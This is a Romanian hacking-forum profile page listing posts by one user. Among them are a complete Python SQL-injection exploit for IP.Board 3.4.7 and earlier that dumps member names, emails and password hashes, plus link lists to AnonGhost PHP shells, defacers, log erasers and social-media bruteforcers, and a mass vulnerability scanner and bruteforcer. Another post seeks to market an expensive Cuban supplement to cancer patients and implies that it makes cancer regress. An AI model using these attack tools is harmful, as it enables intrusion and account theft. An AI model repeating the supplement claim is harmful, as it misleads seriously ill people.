Jump to content

mp4

Members
  • Content Count

    46
  • Joined

  • Last visited

Community Reputation

19 Good

About mp4

  • Rank
    Registered user

Recent Profile Visitors

1486 profile views
  1. Certified Information Security Manager (CISM) – Manager Certificat în Securitatea Informațiilor – este o certificare unică concentrată pe management, care a fost obținută de către mai mult de 16.000 de profesioniști de la introducerea sa în 2003. Spre deosebire de alte certificări de securitate, CISM este dedicată persoanelor care gestionează, realizează designul, supraveghează şi evaluează securitatea informațională a unei organizații.
  2. Am vazut ca nu e pe forum. Eu l-am folosit pe linux, e usor de folosit si ai si comanda de renew ip... Daca accesezi pe web ip-ul respectiv iti apare o pagina cu tor exit node. TorGhost is an anonymization script. TorGhost redirects all internet traffic through SOCKS5 tor proxy. DNS requests are also redirected via tor, thus preventing DNSLeak. The scripts also disables unsafe packets exiting the system. Some packets like ping request can compromise your identity. https://github.com/SusmithKrishnan/torghost
  3. Pentru istoricii romani adevarati, va recomand cu caldura: https://web.archive.org/ ... lasati imaginile trecutului sa vorbeasca. https://web.archive.org/web/20100811013338/http://www.insecurity.ro/ https://web.archive.org/web/20100615223647/http://www.hellsoft.ro/board/ https://web.archive.org/web/20090629111418/http://www.hellsoft.ro:80/news.php
  4. E foarte rar, se vinde doar in Cuba, noi suntem singurii din europa cu autorizatie de punere pe piata. Am gasit contrafacute pe olx. Am gresit eu cand am zis ca e anti-cancer, este un supliment, desi din documentele de la Labiofam, din experimente sunt persoane cu un anumit tip de cancer care a regresat complet.
  5. Salut, vreau sa promovez un website, ce contine un singur produs, un medicament, destul de scump. As vrea sa stiu daca ma poate ajuta cineva contracost cu metode noi de promovare. Daca se poate sa fie selectat ca si target persoanele bonlave de cancer. World Wide, in special pentru Romania, Moldova, Bulgaria... vecinii nostrii in general. Multumesc.
  6. Site oficial: http://www.grab-m.com Download Free Version: http://grab-m.com/download/setup.exe M-am chinuit o luna la programelul asta eu si inca un coleg. Sper sa va placa. Daca nu returneaza prea multe in simple search incercati un query gen: yahoo.com
  7. Features: BETA 1 is released! Requirements: Java 8 (for now) Do not click here.
  8. Intro Data grabbing: URL's (geturl/massurl) -> (scan) Configs, Databases, SQLi's (dork) Full Path Disclosures / Users (fpds) -> (brutefpds) Top websites info (top) Massive scanning XSS, SQLi, LFI, RFI (scan) FTP, SSH, DB's, IMAP (multibruter) Accurate SSH bruteforce (brutefpds) Plan Web Apps Grab url's via 'geturl' or 'massurl' (massurl requires list of tags as file) Scan url's parameters for vulns with 'scan' Servers Pick target, get ip range Scan for services on each IP and bruteforce with 'multibruter' Grab full path disclosures, and so linux usernames Perform SSH bruteforce for specific user with 'brutefpds' Info grabbing Use 'dork' for automatic dorking Use 'fpds' for full path disclosure grabbing Use 'search' for searching someone in ur databases Use 'top' for scanning all top websites of specific nation Others 'Stat' shows actual statistics and informations 'Show' display specific file 'Clear' and 'filter' - remove duplicates, remove blacklisted url's Others MultiBrtuer requirements (php5): php5-mysql - for mysql connections php5-pgsql - for postgresql connections libssh2-php - for ssh connections php5-sybase - for mssql connections php5-imap - for imap connections TODO: Fix problems with grabbing large amount of url's More search engines SQL Injector RFI shell uploader FSU is not secure as it should be Download ba.
  9. [+] AnonGhost Auto SQLi Query Maker [+] https://ghostbin.com/paste/hd26gkco [+] Facebook XMPP Chat Protocol Bruteforce [+] https://ghostbin.com/paste/oynf9bt2 [+] Facebook Brute Reset Codel [+] https://ghostbin.com/paste/e5te5umj [+] Ftp Brute Force [+] https://ghostbin.com/paste/3sxovcuh/edit [+] Facebook Pentester [+] https://ghostbin.com/paste/qyns3ox7 [+] Twitter Brute Force [+] https://ghostbin.com/paste/nubyt3vh Password = ./d3f4ult_v1rUsa
  10. [+] AnonGhost PHP Shell [+] https://ghostbin.com/paste/9ckp3dst [+] Bypass Root Path With Zip File [+] https://ghostbin.com/paste/tdbvr2ug [+] Bypass Forbidden with Python via TCP Protocol [+] https://ghostbin.com/paste/qbrs9r8a [+] Wordpress 0day CSRF + Brute Token [+] https://ghostbin.com/paste/znxkcojv [+] Wordpress Index Hijack [+] https://ghostbin.com/paste/8wf2yj2v [+] CPanel & FTP Auto Defacer [+] https://ghostbin.com/paste/z6jfwrbm [+] Reverse IP Lookup [+] https://ghostbin.com/paste/kaa5na3x [+] Logs Eraser [+] https://ghostbin.com/paste/w9puv3kq [+] Facebook Multi-Account Bruteforce [+] https://ghostbin.com/paste/akn9adf8 [+] Bypass SafeMode [+] https://ghostbin.com/paste/j423dffz [+] Skype BruteForce [+] https://ghostbin.com/paste/r85xqq28 [+] Virtual Bypass Via Error_Log [+] https://ghostbin.com/paste/qjb2shhu [+] Shtml Bypass Symlink Via Error [+] https://ghostbin.com/paste/orqjsu6e [+] Bypass Users Server [+] https://ghostbin.com/paste/koew333z [+] Cpanel Mass Defacer [+] https://ghostbin.com/paste/nt3zc43b [+] Bypass Chmod Directory [+] https://ghostbin.com/paste/2q6vjea3 [+] Bypass Root Path [+] https://ghostbin.com/paste/y8jx2hfs [+] Wordpress Add Admin User [+] https://ghostbin.com/paste/ffqvakw8 [+] Server Informations [+] https://ghostbin.com/paste/om32c59z [+] Twitter Multi-Account Brute force [+] https://ghostbin.com/paste/hsmbtep8 [+] Symlink Bypass [+] https://ghostbin.com/paste/ywv75o46 [+] Bypass /etc/passwd [+] https://ghostbin.com/paste/6nuom97j Password: ./d3f4ult_v1rUsa
  11. #!/usr/bin/env python # Sunday, November 09, 2014 - secthrowaway@safe-mail.net # IP.Board <= 3.4.7 SQLi (blind, error based); # you can adapt to other types of blind injection if 'cache/sql_error_latest.cgi' is unreadable # Script Modified by MakMan -- Hacktic Labs -- https://www.facebook.com/hackticlabs print '\n\n---------------------------------------------------------------------------------' print 'Script Modified by MakMan -- Hacktic Labs -- https://www.facebook.com/hackticlabs' print '---------Script has been modified for different table prefix XXX_members---------' print '---------------------------------------------------------------------------------\n\n\n' url = raw_input('Enter URL http://www.exmaple.com/path_to_ipb :: ') url = url.rstrip('/') ua = "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36" import sys, re import urllib2, urllib def inject(sql): try: urllib2.urlopen(urllib2.Request('%s/interface/ipsconnect/ipsconnect.php' % url, data="act=login&idType=id&id[]=-1&id[]=%s" % urllib.quote('-1) and 1!="\'" and updatexml(NULL,concat (0x3a,(%s)),NULL)#\'' % sql), headers={"User-agent": ua})) except urllib2.HTTPError, e: if e.code == 503: data = urllib2.urlopen(urllib2.Request('%s/cache/sql_error_latest.cgi' % url, headers={"User-agent": ua})).read() txt = re.search("XPATH syntax error: '.*)'", data, re.MULTILINE) if txt is not None: return txt.group(1) sys.exit('Error [3], received unexpected data:\n%s' % data) sys.exit('Error [1]') sys.exit('Error [2]') def get(name, table, num): sqli = 'SELECT %s FROM %s LIMIT %d,1' % (name, table, num) s = int(inject('LENGTH((%s))' % sqli)) if s < 31: return inject(sqli) else: r = '' for i in range(1, s+1, 31): r += inject('SUBSTRING((%s), %i, %i)' % (sqli, i, 31)) return r members_table= inject('SeLecT table_name from information_schema.tables where table_schema=database() and table_name REGEXP 0x6d656d6265727324 limit 0,1') n = inject('SELECT COUNT(*) FROM %s' % members_table) print '----------------------------------------------------------------------------' print '* Found %s users' % n print '----------------------------------------------------------------------------' for j in range(int(n)): print '{:20s} {:20s}'.format('Id',get('member_id', members_table, j)) print '{:20s} {:20s}'.format('Name',get('name', members_table, j)) print '{:20s} {:20s}'.format('Email',get('email', members_table, j)) print '{:20s} {:20s}'.format('Password : Salt',get('CONCAT(members_pass_hash, 0x3a, members_pass_salt)', members_table, j)) print '----------------------------------------------------------------------------' Video: https://vimeo.com/111863081 Credit: Makman
  12. mp4

    Intrebare.

    Tot nebuni sunteti.
  13. mp4

    Intrebare.

    Cum obtii rank de V.I.P? sau Ce conditii trebuiesc indeplinite?
×
×
  • Create New...